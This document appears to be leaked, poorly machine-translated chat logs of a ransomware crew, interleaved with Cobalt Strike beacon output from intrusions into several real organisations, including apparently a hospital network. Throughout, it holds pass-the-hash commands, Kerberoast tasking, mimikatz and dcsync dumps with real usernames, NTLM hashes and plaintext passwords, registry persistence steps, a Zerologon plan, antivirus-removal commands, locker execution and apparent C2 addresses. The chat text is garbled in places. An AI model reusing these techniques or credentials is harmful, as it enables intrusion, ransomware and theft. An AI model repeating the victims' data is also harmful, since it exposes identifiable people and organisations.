PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
NovaNet.main.crispregional.org
HISCODER.main.crispregional.org
``don't code
```

pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
3MCDIDAT.main.crispregional.org
ADSelfService.main.crispregional.org
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org
``FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispispregional.org
CRR-WEB-FS01.main.crispispregional.org
CRR-WEB-BG01.main.crispispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24
``````
TrinisysQA-APP.main.crispregional.org
Trinisys-A8.main.crispregional.org
Trinisys-A7.main.crispregional.org
Trinisys-A6.main.crispregional.org
Trinisys-A5.main.crispregional.org
Trinisys-A4.main.crispregional.org
Trinisys-A2.main.crispregional.org
pyxistest.main.crispregional.org
PYXIS-RPT.main.crispregional.org
PyxisPharmTest.main.crispregional.org
PyxisPharmLive.main.crispregional.org
pyxismed.main.crispregional.org
PYXIS-DB.main.crispregional.org
PYXIS-CCE-TEST.main.crispregional.org
PYXIS-CCE-PROD.main.crispregional.org
PYXIS-APP.main.crispregional.org
pyxisanest.main.crispregional.org
NovaNet.main.crispregional.org
Medisolv.main.crispregional.org
INFOTVSV5.main.crispregional.org
INFOTVSV4.main.crispregional.org
INFOTVSV3.main.crispregional.org
InfoTVsV2.main.crispregional.org
INFOTVSV1.main.crispregional.org
HISCODER.main.crispregional.org
GEPACsTestWS
GEPACS-TestCCG
GEPACS-CCG
FILESTORESQL.main.crispregional.org
DHCP.main.crispregional.org
CRR-WEB-WS01.main.crispispregional.org
CRR-WEB-FS01.main.crispispregional.org
CRR-WEB-BG01.main.crispispregional.org
CRR-PRT-SER.main.crispregional.org
CRRHPUMP2.main.crispregional.org
CRHSWDS.main.crispregional.org
crhs-security.main.crispregional.org
AHTNH1.main.crispregional.org
ADSelfService.main.crispregional.org
3MHIS.main.crispregional.org
3MCDISTEST.main.crispregional.org
3MCDIDAT.main.crispregional.org
``Not yet. Are we done yet?
10.1.21.95
10.1.21.98
``````
crhsesxi24.main.crispregional.org
crhsesxi27.main.crispregional.org
``eThoit4Rueh4aigheiDeiqua means okay.
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:/ProgramData/pshashes.txt -append -force -encoding UTF8 into 4540 (x64)
``Command includes hashkat parameter? is this invoke kerb removed from tulchyna format hashkat? nohashekat immediately duplicated herea you have fixed? kerb dropped tl2without response groups and oushkas not removed chotaTell me in groups in which workTax, let's see what was done while I was away and in general what is doneHelloHi!All helloTo all put their files and until tomorrow in slipDid you put? Until tonightDid you build the dll with the flag -keep? 1-2 pieces where there is a vomozozozhnosti put?
beacon> shell reg query HKCU\Environment
[*] Tasked beacon to run: reg query HKCU\Environment
[+] host called home, sent: 57 bytes
[+] received output:

HKEY_CURRENT_USER\Environment
    Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp
    TMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp
    OneDrive REG_EXPAND_SZ C:{Windows\system32\config\systemprofile\OneDrive
    UserInitMprLogonScript REG_SZ rundll32.exe C:Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint

``````
	- Load this DLL into a writable directory
	- Click on session, persistence - non-elevated - userinitmprlogonscriptkey
	- Type Command : rundll32.exe C:\temp\keep64.dll,entryPoint (MUST specify full path to dll file, MUST rename dll file before loading into something more "organic" depending on files around it)
	- Run
	- Check if the registry entry was created with a shell reg query HKCU\Environment
``1 this is a must and 2 if all goes well tomorrow by 4 and tomorrow definitely closes 1-2 networks put in current networks new and you can go get it http://github.com/0xthirteen/StauKitokili at the end of this month or next month so new ones on receipt immediately check it when? old cobbs then disconnect you from english[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take it out who doesn`t already have it ``
23.106.160.195
https://topevi.com
-
185.150.190.113:61718
O5xFflqqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
``coba''
74.118.138.108
https://wolfnew.com
-
209.222.98.96:32878
onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644
``Boys write here on VPN https://helpdocpt.club/forums/vpn.11/ like what's what''.
user3
user3 @user3
💬
02:00
Domain
ing server: STAKC-DC2019.STAKC.local:389

tl1
Team Lead 1 @tl1
Admin
02:01
I.e. to create a conf?

user3
user3 @user3
💬
02:01
yes
user 7,4,9,3

``The one I asked you about? Will there be a confab or not?
```
 Server Name IP Address
 ----------- ----------
 FISHUSA-DC 192.168.1.91
``EA
```
Administrator
``DA
```
Administrator dc-admin djpastore3219
percona3487

``Hello Teamsters'' Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc>sAMAccountName : nddevkremmecredes changed today
these are new
pth JDOSSN\ndmicjsater 67595f137f7f5908e3ed202bc4b14aa9 I see here in terms of escalation just a systematic examination of files/share/available ARMs/container browsers/cache/emailnot kerberosti specifically about the tickets now, check on available hosts, which in memory there are kerberos ticketsada in homedirs also look at them some technical rights even have as you see-you have users here that are not the most fucked up so tohomedirs users look but do not get on them `` ``
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
[+] received output:
172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)

[+] received output:
172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN)

[+] received output:
172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN)

[+] received output:
172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN)

[+] received output:
172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN)

[+] received output:
172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN)

[+] received output:
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)

[+] received output:
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)

[+] received output:
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``otherwise, usually nothing can work, servers will see other subnets and segments and look for servers.So there is a differentiation of access rules through groups as razaverno? yes i can assume that you can not get out of the subnet judging by the currently available polzakamt good link shown impacket with lsaasi with bladhoundbud try it out.and has options to dump lsaas and decrypt it wellplay with the tool works relying on bloodhound if properly configured and there is no direct path to the DA there is a plan of attack, but it is relying on cars that are not visible in the network..and under some conditions - no = )under some conditions in general it is clear what groups which cars adminsnu as far as I remember it relies on the composition if such a prescription, only changed the computer and it was left on the oldsnyal?yes i already did)i confess i do not use this thing and usually try to carefully with large networks but it will be wildly noisytry))you can also remove bloodhound.... think and check the guess)a how can i learn what rights gives for example NDLEADING_Computer_Account_Adminspalping the grid and without simply brutal and neatly and neatly if you look closelyvobshchem
here is where to click the buttons next>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local

The girl also has this group of home directories available under their token when directly browsing the "pull up" directory
>homeDirectory: \jdossn.local\homedirs\NDLEADING\andcarhsherm
``There's a home dir pulled from the fsu of these polzak cars are empty yes? Now there's another peculiarity
looked where this thing goes on OU=NDLEADING
and on OU=SD** I would have cheked this user now back to hell_compensation! and is there OU=NDLEADING? now further OU=WIRESTERER
there is also an OU
in ad_compsalternative group>memberOf: CN=WIRIESTERER_SD_Adminsthere is no such thing. sd seems to be a prefix that means locationand then we go logically and search by handThe most obvious - search for OU=SDa question - what is SD ?
looking for an answer to it here's what to come up with a passord_reset ...which is in the group SD_Admins
read the adda carefully, I also noticed it. Under the admins, it's mostly on the network, or this one

```
>memberOf: CN=NDLEADING_SD_Admins,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
``Look what an interesting group isn't`` >memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local``
User name ndcarjjohns
Full Name Justin Johnson
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/15/2020 7:35:46 AM
Password expires 1/7/2021 7:35:46 AM
Password changeable 10/16/2020 7:35:46 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\andcarjjohns
Last logon 10/19/2020 7:33:11 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users*NDLEADING_All_Email
                             *NDLEADING_SD_Technici*NDLEADING_ALL
The command completed successfully.

``````
User name ndcardkolst
Full Name Darlene Kolstad
Comment carrington, nd
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 1:54:07 PM
Password expires 1/12/2021 1:54:07 PM
Password changeable 10/21/2020 1:54:07 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\andcardkolst
Last logon 10/22/2020 7:31:17 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *NDLEADING_ACCOUNTING *Domain Users
                             *NDLEADING_Computer_Ac*NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
                             *NDLEADING_EQUIPRDB-FI*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_ALL
                             *NDLEADING_Excel_Users*NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca
The command completed successfully.

``````
User name ndcarhsherm
Full Name Hunter Sherman
Comment Hunter Sherman
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 3:49:45 PM
Password expires 1/12/2021 3:49:45 PM
Password changeable 10/21/2020 3:49:45 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\andcarhsherm
Last logon 10/22/2020 9:15:49 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
                             *NDLEADING_All_Email *NDLEADING_SD_Technici
                             *NDLEADING_SD_Users
The command completed successfully.

``````
User name ndmicjsater
Full Name Jason Sateren
Comment Michigan,ND
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/22/2020 6:49:57 AM
Password expires 1/14/2021 6:49:57 AM
Password changeable 10/23/2020 6:49:57 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\ndmicjsater
Last logon 10/22/2020 7:08:15 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_PARTS *NDLEADING_Dealer_Port
                             *NDLEADING_Computer_Ac*NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
                             *NDLEADING_SD_Technici*NDLEADING SharePoint
                             *NDLEADING_ALL *NDLEADING_SD_Users
                             *NDLEADING_Excel_Users*NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca*NDLEADING_EQUIPRDB-AL
The command completed successfully.

``````
User name ndcartcarr
Full Name Theresa Carr
Comment Theresa Carr
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 11:54:49 AM
Password expires 1/12/2021 11:54:49 AM
Password changeable 10/21/2020 11:54:49 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\andcartcarr
Last logon 10/22/2020 7:02:59 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
                             *NDLEADING_All_Users *NDLEADING_EQUIPRDB-SE
                             *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_SERVICE *NDLEADING_ALL
                             *NDLEADING SharePoint
The command completed successfully.


``````
User name ndevbernst
Full Name Blaine Ernst
Comment BLAINE ERNST
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/21/2020 6:22:54 AM
Password expires 1/13/2021 6:22:54 AM
Password changeable 10/22/2020 6:22:54 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \jdossn.local\homedirs\NDLEADING\nddevbernst
Last logon 10/22/2020 2:16:08 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
                             *NDLEADING_All_Users *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
                             *NDLEADING_SD_Technici*NDLEADING_ALL
                             *NDLEADING_Excel_Users*NDLEADING_Citrix_Loca
                             *NDLEADING_EQUIPRDB-AL
The command completed successfully.

``if.
```
>trustAttributes: 0 []
```
then we can consider that the trust does not work?there is only 1 out of 4 trusts alive and it pings with a loss of 100% and maybe it will save you time but i recommend to learn the command tool requires additional setup as you see it is very useful in case you have some credits `ndmicjsater` `ndcarddalma` `nddevbernst` have i thrown you this tool?
https://github.com/Hackndo/Іѕаѕѕуа just threw it to the guys. i've been collecting everything i could get my hands on?
pth W08872612198 "Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a

Username : nddevbernst
Password : NDleading2021!

LEADMIN Deere0419!

Username : ndcartcarr
Domain : JDOSSN
NTLM : b25a68a3d5bc30ea97872f6b004c58be
SHA1 : d7a0e055c8e4b9947e48d99a66223a3dbe522bee

Username : ndmicjsater
Domain : JDOSSN
NTLM : c60a90ad0e486ae0efd1229b04824948
SHA1 : 450a811afd21b2f402b34575cbca7f386a3b2a47
DPAPI : 5708598b47c3d8cea60c8bbd8d6d12bf

jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:227a7d16ba750264459c885d666b7eaa:::

Username : ndcarhsherm
Domain : JDOSSN
NTLM : d7341bcb2ca0f8586c6f1974ead1ab1f
SHA1 : c7b7b0db23a67ce02082c6351720a1fc5ac40d69
DPAPI : cfa41b24958547a50b0604ba6d0d04f6

Username : ndcardkolst
Domain : JDOSSN
NTLM : b9b6aa1456c1a351844910877a487cf9
SHA1 : efae1f6b171a18bf4b16231fcc32d23df10e538e
DPAPI : a4dbe1e1a06257d0c44b1a009045169e

Username : ndcartcarr
Domain : JDOSSN
NTLM : 526ec72d381501fffb75e74934827f2f
SHA1 : 9ccae5674e564db712b7a9be8ebcba4d754f57c9
DPAPI : c652bcd334907d5d084167b804d14ccf

 * Username : ndcarrtedro
 * Domain : JDOSSN
 * NTLM : c9e553f47018e2be97ec3307bd47df25
 * SHA1 : f6769930484ed5afd45e5aa95d1490e0fe2042e2
 
 * Username : ndcarjjohns
 * Domain : JDOSSN
 * NTLM : 4178a0f16bad0c2a649398e88994568c
 * SHA1 : ddc6c829305d0282c54b3fed400c67a999e71611
 * DPAPI : 4fdbb5025f3fec11c123375623d2287a
 * Username : ndcarjjohns
 * Domain : JDOSSN.LOCAL
 * Password : Ndleading11
 
 * Username : nddevkodell
 * Domain : JDOSSN
 * NTLM : 1ae22c3e605fcb0a1d17d7c0b8509281
 * SHA1 : 780ca6033c42c3b6ab91fd119e5a1b4c2db2696f
 * DPAPI : 0f4bacdbd1dc64f63ecfda1d9c05d690
 
 * Username : ndcarddalma
 * Domain : JDOSSN
 * NTLM : db7aa0db0148b3b707b9ae6de91e3f25
 * SHA1 : 9eaec33adae1e6193d9c381e449271008c5b0035
 * DPAPI : 830d9615902b542addd3faeeca02ba3e
``Good morning countryuser9user8@tl2 add 8 and 9 here domainhostname doesn't resolve or catch 100% loss? so never turned on the VPN? all, my chizhik went home...there is one 2003. tried ms17, netapi, blukip, spoolss - all to no avail. I tried 17-10 and maybe it will work, but it needs the codes ... 37 pieces visible only there are nothing visible computers, I'll compare 6 pieces>operatingSystem: Windows Server 2003 then do not wait for hashes) and no password from the polozak only today the domain appeared. I think yesterday I wrote off. domain behind the vpn2 day in operation, you only removed the hashes? there at least need the system. and the cross of course too early to put, just started to immediately put a cross on the network there is an account at the entrance is not a hash is rarely there is something there ... out of 5 people did not remember?) I, by the way, forgot to check the descriptors. well that reminded me) and the dictionary bruta as a local admin somewhere or not among admins ... apparently the network scanner may not be among the admins ...
>description: (Left 22/03/18) PW: L3av3r2018
>description: ``who/what?
dn:CN=RCP Scanning,OU=Ireland,OU=Ball Users,DC=ballymoregroup,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: RCP Scanning
>sn: Scanning
>description: Scans123
No, I'm still going through the files, but he's so fucked up that it's faster to crack a password))[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=gB636LLSfv3w4ygbh) just sit and wait?)? Is this some kind of joke? Like what? And the rest...? The user has no rights anywhere, so we wait for hashes...WPN
```
	server REG_SZ 46.34.1.2:4433
	domain REG_SZ LocalDomain
	user REG_SZ rpearce
	owner REG_SZ BALLYMOREGROUP\rpearce
``DK
```
 Server Name IP Address
 ----------- ----------
 BALLY44HODC1 192.0.2.246
 BALLY35303 192.168.3.159
 EGDC2 192.168.200.160
 BGAZRDC01 10.0.180.6
``EA
```
Administrator CITAdmin
``YES
```
Administrator AHarrison amihhaljova
aseymour bespadmin CITAdmin
completeit david.meadows isobtchak
jay.newell nreid rdeason
sdunn traubenheimer
``What's the plan? prtuuzhe isgrantweber.comuser9 to confDisplaying is)Create a confinement grantweber.comI need to leave to transfer money for the internet and pay extra for a speedup katyda domainkredyvot by the way, since lin in domainkat there was a chain from the current to timesavers and from there through the IT people to linux1.The network of 20 computers is done,pkgprod.com) go to the IT guys and see if they have another domain.
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
``There's more sessions coming in, so let's either take them to work or finish them from the current open ones.``Key Capi for the future, don't ever fucking rush from SYSTEM from windows system32starting always from there and for the futureOrdered from sys32gotovo from under winlogon? Or they're up or something else look at the processes, is there an uplocker? Put it in C:\windows\system32beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 7376-91FE

 Directory of C:\hp

10/20/2020 02:36 PM <DIR> .
10/20/2020 02:36 PM <DIR> .
02/09/2017 11:57 PM 9,662 csIcon.ico
08/15/2019 11:04 AM <DIR> hpdiags
08/15/2019 10:57 AM <DIR> hpsmh
02/11/2014 10:11 AM <DIR> sslshare
10/20/2020 02:19 PM 189,440 start.exe
09/15/2016 12:46 AM 2,307 survey.dtd
10/20/2020 02:40 PM 189,440 Updater.exe
               4 File(s) 390,849 bytes
               5 Dir(s) 430,841,409,536 bytes freeDo you know if there are any backups in vg? Mb it takes a long time ``.
beacon> shell C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 48 bytes
beacon> run C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 35 bytes
beacon> execute C:\hp\Updater.exe
[*] Tasked beacon to execute: C:\hp\Updater.exe
[+] host called home, sent: 25 bytes
``Why?'' On dk don't work locker encrypted until it's cut off there are backups and virtualsAll encrypted except dkpoc domain don't temper accesses in the vgehunuu, they have now)
```
02:09 PM

``Orderly in 4 hours only would have to run the build so because there is no need to rushThis is late found) YesLfA have you already started to run the build?
[+] received output:
192.168.5.12:445

[+] received output:
192.168.5.13:445

[+] received output:
192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
192.168.5.23:445
192.168.5.24:445

[+] received output:
192.168.5.25:445
192.168.5.26:445
192.168.5.27:445
192.168.5.28:445
192.168.5.30:445

[+] received output:
192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP)
192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX)

[+] received output:
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.188:445
192.168.5.229:445

[+] received output:
192.168.5.231:445
192.168.5.232:445
192.168.5.237:445

[+] received output:
192.168.5.240:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.241:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.242:445 (platform: 500 version: 4.9 name: TS-IX4B domain: WORKGROUP)
192.168.5.243:445 (platform: 500 version: 4.9 name: TS-IX4C domain: WORKGROUP)

[+] received output:
192.168.5.245:445 (platform: 500 version: 6.1 name: AS7004T-D8A5 domain: WORKGROUP)
192.168.5.246:445 (platform: 500 version: 6.1 name: AS7004T-D8E3 domain: WORKGROUP)
192.168.5.247:445 (platform: 500 version: 6.1 name: AS7004T-D8E5 domain: WORKGROUP)
192.168.5.248:445 (platform: 500 version: 6.1 name: AS7004T-D8BB domain: WORKGROUP)
Scanner module is complete
``````
/FORCEUNINSTALL Forcibly removes McAfee Agent from the client system.

Example: FrmInst.exe /FORCEUNINSTALL

``````
net share {sharename | devicename | drive:path} /DELETE
``````
 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC
 NETLOGON Logon server share
 Shares
 SYSVOL Logon server share
```
how do i remove the balloon from the dc ?i'll move the group to 1.deonepick how do i put it in .exe and somehow start.exe or something like that there .ex_How do i rename it ? The extension ?Do not forget that dc is the last thing to do)
1CvlfdsVN58QacQDIsVwk3cXrUrgRjXN3G4R1hrWBzYkuyww5cteLGD4ryuGnv
1) at the time I got the message the link was already invalid.
2) I did not order them I wrote you on the 16th of the year I have to prepare in advance I do not have it too so this is the pointWhere do we have it? Why now? Time is not right. Do you have a build? We need to lock it fasterDefender turned off in general Prepare it and look for Makafi turn off there are some satchels?) http://www.pkgprod.com/поставим build today ok[ ] (https://mediaeveryone.com/group/pkgprod-com?msg=uRSXzYBQkq78kpC9L) and their site has) thereThere is a guy sitting in business dealing with PC billing for $ 2k `` ``
pack3009
``on the avlab just like that)`` There is a possibility to check 5c9f2b00a6b5cd75dc76e2adb3369271da and there are no trustsPose a story /16chet half a pc online ... now will doa did you re-take the hell info?
2k12server - no
frontdesk - macAfee
pkg-101 - macAfee
timeclocksql - no
barbara-hp-2019 - macAfee winDef
sales2-hp-2019 - McAfee winDef
sales1-hp-2019 - McAfee
``````
[+] received output:
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
That's two local users.
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
How do you know if you have a local admin on the dk? You can always get on the dk if you have a local admin who is in the dsingadano you first got on the dk firstThe standard way and through setntlm back removed logonpasswords and there was the old hash machine accountsmagia)) how?)repaired)we are not just looking for a distant silent serveras dk will be cleaned up in two secondsbecause here the tactic of "hiding in front of everyone" does not workwhich in any case do not fastenNeed to fasten on dk as soon as they will spam can start to clean the network awaybase> pth pkgprod\linux 5c9f2b00a6b5cd75dc76e2adb3369271Authorization through Restore stepsshttps://github.com/dirkjanm/CVE-2020-1472 but we have only one option here: shoot a zerologon on one of the dk, remove the dxink
jump to the neighboring dk, take hashdump and hope it's not replicated yet and hash the old machine account. The first dkdo hashdump on the first dkdo zero worked.
beacon> shell net user "Administrator" /dom
[*] Tasked beacon to run: net user "Administrator" /dom
[+] host called home, sent: 60 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.

System error 5 has occurred.

Access is denied.


``We have to look for a solution to this issue after using domain accounts will not work nowThis is a local admin DCpass
mts9475!
``without a domain? beacon> pth .\Administrator 6f2cc106781ba05ddc908d6e32eb1838daCNA option? no via cobalt young, via shapzerlogon done? structured servers, av, nasa, virtualization, etc., then hurry)via zero done? beacon> dcsync pkgprod.local
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:pkgprod.local /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'pkgprod.local' will be the domain
[DC] '2k12server.pkgprod.local' will be the DC server
[DC] Exporting domain 'pkgprod.local'
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
1135 zztest 6f2cc106781ba05ddc908d6e32eb1838 66048
1121 COMPUTER-1$ 9e4861eea9caaf03ab3741219905167e 4096
1125 JODY-PC$ 1be2a00d8363e7aa06a2be68e4e99576 4096
1117 PPCCOMP$ 1fe00279412bc69c535f95a6373c5a05 4096
1138 louisold fd5ee0e622e6f6c7526cc492cd509dc5 512
1143 timesavers eb026d6c093b199f57185a49a9fa324e 512
1148 micro2 1d414494cbe8c70c4321a26bfd6cc59b 66048
1131 DAN-HP$ d14820e4d9433a47e0ceddd48d0a06f6 4096
1130 louis fd5ee0e622e6f6c7526cc492cd509dc5 66048
1141 TONY-PC$ 9c906ae5277d876ace56baad914f0051 4096
1137 PKG-100$ 2817feb5c10f33de5e24b21737abf01b 4096
1119 SUE-PC$ 26efe407363f5d03e502639bd290659c 4096
1128 WENDY-PC$ f5439870ad6502228e07201dc7af491f 4096
1146 TELEMARKETING-H$ e068b3f3a033cd63d111c5bda50b3845 4096
1149 Spare 5af88c4732565f3cff7d8dd1f6ea314f 66048
1166 mtsi cdbb81ea052f92ce3e3a3208dfc2aade 66048
1165 PAC 3179b0258923f6e05ea684640e8e8a42 512
1150 Gretta 7b3785d867105a95e9cef80c4f7a722e 66048
1168 srivera c09783c159543b16d7c4830f743e3e60 66048
1127 jon 5af88c4732565f3cff7d8dd1f6ea314f 66048
1169 TED-LAPTOP$ 16be6f44317f74a831ee08618c6c4afd 4096
1123 TELEMARKET$ 3eb0a5d8c1a23495faa2d2c87b50d71e 4096
1129 JONM-PC$ dbeacb7d9a58c1bcc110c43bccace279 4096
1159 HP-TONY$ eec4fb89b81490d370b9d9ff6cfe1911 4096
1170 mhorgan 640d1d06d738a8ac7104f5ffe9343d5b 512
1140 linux 5c9f2b00a6b5cd75dc76e2adb3369271 66048
1151 FL1 1c145fb415625cbf7eb4a8079a8be5ef 66048
1142 tony 05b073daa9c1b3b909ff5ae2e4604bb5 66048
1132 rmg f0c158a0788788e5dc9e855a35020163 66048
1136 PKG-102$ 946d6fcb5d956bb6de2da361002d06a6 4096
1120 barb 50172476292c7784efcdf8da9d415a8f 66048
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
1162 jess 9bed08d5afa9d00f06ff943c9fedd570 66048
1144 micro 1d414494cbe8c70c4321a26bfd6cc59b 66048
1116 telemkt 0dc70321eb7dd2aaf63e3e3f0d520dc3 66048
1139 PKG-101$ 57fd8fff3a57275d47ed819e98fb293d 4096
1133 frontdesk 5af88c4732565f3cff7d8dd1f6ea314f 66048
1118 jen 67ba48f6c118b9c433a79a40d1ba5984 66048
1152 FL2 1c145fb415625cbf7eb4a8079a8be5ef 66048
1147 TIMECLOCKSQL$ 4f4f2298cdbb4564c82a43d570de2d 4096
1163 SALES1-HP-2019$ 511e98171aea1fa8da652bb7a4706523 4096
1134 FRONTDESK$ a4ef2d7813cc54616741cb7c09a0fbb9 4096
1160 BARBARA-HP-2019$ 17ad6d135f6f1a081e66b72e07541519 4096
1124 jody 13cdef39a416a4c50618630f7be02479 66048
1161 SALES2-HP-2019$ 83832d2cd61cfa87e26aee2548d6eced 4096
1126 wendy 9bed08d5afa9d00f06ff943c9fedd570 66048
1145 tele d7e35af358caba17dd77018cb86fb87d 66048
1167 Ted dd7a02d47fe222b5091ef2974c69b2ec 66048
1001 2K12SERVER$ 31d6cfe0d16ae931b73c59d7e0c089c0 532480Creates null files then we'll leave it for tomorrow
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\ProgramData\Adobe
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 28 bytes
[+] received output:

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

